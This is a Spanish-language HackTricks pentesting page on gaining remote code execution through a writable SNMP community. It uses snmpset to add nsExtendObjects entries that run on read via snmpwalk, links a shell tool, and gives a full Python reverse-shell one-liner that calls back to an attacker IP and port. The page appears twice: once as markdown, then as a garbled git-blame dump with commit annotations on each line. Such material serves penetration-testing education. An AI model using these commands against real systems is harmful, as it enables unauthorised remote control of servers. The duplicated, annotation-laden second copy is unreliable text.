hacktricks/network-services-pentesting/pentesting-snmp/snmp-rce.md

<details>

<summary><strong>Aprende hacking en AWS de cero a héroe con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Otras formas de apoyar a HackTricks:

* Si quieres ver tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF**, consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Consigue el [**merchandising oficial de PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubre [**La Familia PEASS**](https://opensea.io/collection/the-peass-family), nuestra colección de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Únete al** 💬 [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Comparte tus trucos de hacking enviando PRs a los repositorios de github de** [**HackTricks**](https://github.com/carlospolop/hacktricks) y [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>

# SNMP RCE

SNMP puede ser explotado por un atacante si el administrador pasa por alto su configuración predeterminada en el dispositivo o servidor. Al **abusar de la comunidad SNMP con permisos de escritura (rwcommunity)** en un sistema operativo Linux, el atacante puede ejecutar comandos en el servidor.

## Extendiendo Servicios con Comandos Adicionales

Para extender los servicios SNMP y agregar comandos extras, es posible añadir nuevas **filas a la tabla "nsExtendObjects"**. Esto se puede lograr utilizando el comando `snmpset` y proporcionando los parámetros necesarios, incluyendo la ruta absoluta al ejecutable y el comando a ser ejecutado:
```bash
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c c0nfig localhost \
'nsExtendStatus."evilcommand"' = createAndGo \
'nsExtendCommand."evilcommand"' = /bin/echo \
'nsExtendArgs."evilcommand"' = 'hello world'
```
## Inyección de Comandos para Ejecución

Inyectar comandos para ejecutar en el servicio SNMP requiere la existencia y posibilidad de ejecución del binario/script llamado. El **`NET-SNMP-EXTEND-MIB`** exige proporcionar la ruta absoluta al ejecutable.

Para confirmar la ejecución del comando inyectado, se puede utilizar el comando `snmpwalk` para enumerar el servicio SNMP. **El resultado mostrará el comando y sus detalles asociados**, incluyendo la ruta absoluta:
```bash
snmpwalk -v2c -c SuP3RPrivCom90 10.129.2.26 NET-SNMP-EXTEND-MIB::nsExtendObjects
```
## Ejecución de los Comandos Inyectados

Cuando **el comando inyectado es leído, se ejecuta**. Este comportamiento es conocido como **`run-on-read()`**. La ejecución del comando puede ser observada durante la lectura con snmpwalk.

### Obteniendo Shell del Servidor con SNMP

Para tomar control sobre el servidor y obtener un shell del servidor, se puede utilizar un script de Python desarrollado por mxrch desde [**https://github.com/mxrch/snmp-shell.git**](https://github.com/mxrch/snmp-shell.git).

Alternativamente, se puede crear manualmente un reverse shell inyectando un comando específico en SNMP. Este comando, activado por el snmpwalk, establece una conexión de reverse shell hacia la máquina del atacante, permitiendo el control sobre la máquina víctima.
Puedes instalar el pre-requisito para ejecutar esto:
```bash
sudo apt install snmp snmp-mibs-downloader rlwrap -y
git clone https://github.com/mxrch/snmp-shell
cd snmp-shell
sudo python3 -m pip install -r requirements.txt
```
O una shell inversa:
```bash
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c SuP3RPrivCom90 10.129.2.26 'nsExtendStatus."command10"' = createAndGo 'nsExtendCommand."command10"' = /usr/bin/python3.6 'nsExtendArgs."command10"' = '-c "import sys,socket,os,pty;s=socket.socket();s.connect((\"10.10.14.84\",8999));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")"'
```
# Referencias
* [https://rioasmara.com/2021/02/05/snmp-arbitary-command-execution-and-shell/](https://rioasmara.com/2021/02/05/snmp-arbitary-command-execution-and-shell/)


<details>

<summary><strong>Aprende hacking en AWS de cero a héroe con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Otras formas de apoyar a HackTricks:

* Si quieres ver a tu **empresa anunciada en HackTricks** o **descargar HackTricks en PDF** consulta los [**PLANES DE SUSCRIPCIÓN**](https://github.com/sponsors/carlospolop)!
* Consigue el [**merchandising oficial de PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubre [**La Familia PEASS**](https://opensea.io/collection/the-peass-family), nuestra colección de [**NFTs**](https://opensea.io/collection/the-peass-family) exclusivos
* **Únete al** 💬 [**grupo de Discord**](https://discord.gg/hRep4RUj7f) o al [**grupo de telegram**](https://t.me/peass) o **sígueme** en **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
* **Comparte tus trucos de hacking enviando PRs a los repositorios de github** [**HackTricks**](https://github.com/carlospolop/hacktricks) y [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).

</details>
f 2023-06-05 18:33:24 +00:00			`<details>`

Translated ['network-services-pentesting/pentesting-printers/README.md', 2024-01-08 12:07:12 +00:00			`<summary><strong>Aprende hacking en AWS de cero a héroe con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
f 2023-06-05 18:33:24 +00:00
Translated ['network-services-pentesting/pentesting-printers/README.md', 2024-01-08 12:07:12 +00:00			`Otras formas de apoyar a HackTricks:`
f 2023-06-05 18:33:24 +00:00
Translated ['network-services-pentesting/pentesting-printers/README.md', 2024-01-08 12:07:12 +00:00			`* Si quieres ver tu empresa anunciada en HackTricks o descargar HackTricks en PDF, consulta los [PLANES DE SUSCRIPCIÓN](https://github.com/sponsors/carlospolop)!`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-02-03 16:55:47 +00:00			`* Consigue el [merchandising oficial de PEASS & HackTricks](https://peass.creator-spring.com)`
Translated ['network-services-pentesting/pentesting-printers/README.md', 2024-01-08 12:07:12 +00:00			`* Descubre [La Familia PEASS](https://opensea.io/collection/the-peass-family), nuestra colección de [NFTs](https://opensea.io/collection/the-peass-family) exclusivos`
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-02-03 16:55:47 +00:00			`* Únete al 💬 [grupo de Discord](https://discord.gg/hRep4RUj7f) o al [grupo de telegram](https://t.me/peass) o sígueme en Twitter 🐦 [@carlospolopm](https://twitter.com/carlospolopm).`
			`* Comparte tus trucos de hacking enviando PRs a los repositorios de github de [HackTricks](https://github.com/carlospolop/hacktricks) y [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud).`
f 2023-06-05 18:33:24 +00:00
			`</details>`

Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-02-03 16:55:47 +00:00			`# SNMP RCE`
f 2023-06-05 18:33:24 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-02-03 16:55:47 +00:00			`SNMP puede ser explotado por un atacante si el administrador pasa por alto su configuración predeterminada en el dispositivo o servidor. Al abusar de la comunidad SNMP con permisos de escritura (rwcommunity) en un sistema operativo Linux, el atacante puede ejecutar comandos en el servidor.`
f 2023-06-05 18:33:24 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-02-03 16:55:47 +00:00			`## Extendiendo Servicios con Comandos Adicionales`
f 2023-06-05 18:33:24 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-02-03 16:55:47 +00:00			Para extender los servicios SNMP y agregar comandos extras, es posible añadir nuevas filas a la tabla "nsExtendObjects". Esto se puede lograr utilizando el comando `snmpset` y proporcionando los parámetros necesarios, incluyendo la ruta absoluta al ejecutable y el comando a ser ejecutado:
f 2023-06-05 18:33:24 +00:00			```bash
			`snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c c0nfig localhost \`
			`'nsExtendStatus."evilcommand"' = createAndGo \`
			`'nsExtendCommand."evilcommand"' = /bin/echo \`
			`'nsExtendArgs."evilcommand"' = 'hello world'`
			```
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-02-03 16:55:47 +00:00			`## Inyección de Comandos para Ejecución`
f 2023-06-05 18:33:24 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-02-03 16:55:47 +00:00			Inyectar comandos para ejecutar en el servicio SNMP requiere la existencia y posibilidad de ejecución del binario/script llamado. El `NET-SNMP-EXTEND-MIB` exige proporcionar la ruta absoluta al ejecutable.
f 2023-06-05 18:33:24 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-02-03 16:55:47 +00:00			Para confirmar la ejecución del comando inyectado, se puede utilizar el comando `snmpwalk` para enumerar el servicio SNMP. El resultado mostrará el comando y sus detalles asociados, incluyendo la ruta absoluta:
f 2023-06-05 18:33:24 +00:00			```bash
			`snmpwalk -v2c -c SuP3RPrivCom90 10.129.2.26 NET-SNMP-EXTEND-MIB::nsExtendObjects`
			```
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-02-03 16:55:47 +00:00			`## Ejecución de los Comandos Inyectados`
f 2023-06-05 18:33:24 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-02-03 16:55:47 +00:00			Cuando el comando inyectado es leído, se ejecuta. Este comportamiento es conocido como `run-on-read()`. La ejecución del comando puede ser observada durante la lectura con snmpwalk.
f 2023-06-05 18:33:24 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-02-03 16:55:47 +00:00			`### Obteniendo Shell del Servidor con SNMP`
f 2023-06-05 18:33:24 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-02-03 16:55:47 +00:00			`Para tomar control sobre el servidor y obtener un shell del servidor, se puede utilizar un script de Python desarrollado por mxrch desde [https://github.com/mxrch/snmp-shell.git](https://github.com/mxrch/snmp-shell.git).`
f 2023-06-05 18:33:24 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-02-03 16:55:47 +00:00			`Alternativamente, se puede crear manualmente un reverse shell inyectando un comando específico en SNMP. Este comando, activado por el snmpwalk, establece una conexión de reverse shell hacia la máquina del atacante, permitiendo el control sobre la máquina víctima.`
Translated ['network-services-pentesting/pentesting-printers/README.md', 2024-01-08 12:07:12 +00:00			`Puedes instalar el pre-requisito para ejecutar esto:`
f 2023-06-05 18:33:24 +00:00			```bash
			`sudo apt install snmp snmp-mibs-downloader rlwrap -y`
			`git clone https://github.com/mxrch/snmp-shell`
			`cd snmp-shell`
			`sudo python3 -m pip install -r requirements.txt`
			```
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-02-03 16:55:47 +00:00			`O una shell inversa:`
f 2023-06-05 18:33:24 +00:00			```bash
			`snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c SuP3RPrivCom90 10.129.2.26 'nsExtendStatus."command10"' = createAndGo 'nsExtendCommand."command10"' = /usr/bin/python3.6 'nsExtendArgs."command10"' = '-c "import sys,socket,os,pty;s=socket.socket();s.connect((\"10.10.14.84\",8999));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")"'`
			```
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-02-03 16:55:47 +00:00			`# Referencias`
			`* [https://rioasmara.com/2021/02/05/snmp-arbitary-command-execution-and-shell/](https://rioasmara.com/2021/02/05/snmp-arbitary-command-execution-and-shell/)`
Translated ['network-services-pentesting/pentesting-printers/README.md', 2024-01-08 12:07:12 +00:00
f 2023-06-05 18:33:24 +00:00
			`<details>`

Translated ['network-services-pentesting/pentesting-printers/README.md', 2024-01-08 12:07:12 +00:00			`<summary><strong>Aprende hacking en AWS de cero a héroe con</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>`
f 2023-06-05 18:33:24 +00:00
Translated ['network-services-pentesting/pentesting-printers/README.md', 2024-01-08 12:07:12 +00:00			`Otras formas de apoyar a HackTricks:`
f 2023-06-05 18:33:24 +00:00
Translated ['macos-hardening/macos-security-and-privilege-escalation/mac 2024-02-03 16:55:47 +00:00			`* Si quieres ver a tu empresa anunciada en HackTricks o descargar HackTricks en PDF consulta los [PLANES DE SUSCRIPCIÓN](https://github.com/sponsors/carlospolop)!`
Translated ['network-services-pentesting/pentesting-printers/README.md', 2024-01-08 12:07:12 +00:00			`* Consigue el [merchandising oficial de PEASS & HackTricks](https://peass.creator-spring.com)`
			`* Descubre [La Familia PEASS](https://opensea.io/collection/the-peass-family), nuestra colección de [NFTs](https://opensea.io/collection/the-peass-family) exclusivos`
			`* Únete al 💬 [grupo de Discord](https://discord.gg/hRep4RUj7f) o al [grupo de telegram](https://t.me/peass) o sígueme en Twitter 🐦 [@carlospolopm](https://twitter.com/carlospolopm).`
			`* Comparte tus trucos de hacking enviando PRs a los repositorios de github [HackTricks](https://github.com/carlospolop/hacktricks) y [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud).`
f 2023-06-05 18:33:24 +00:00
			`</details>`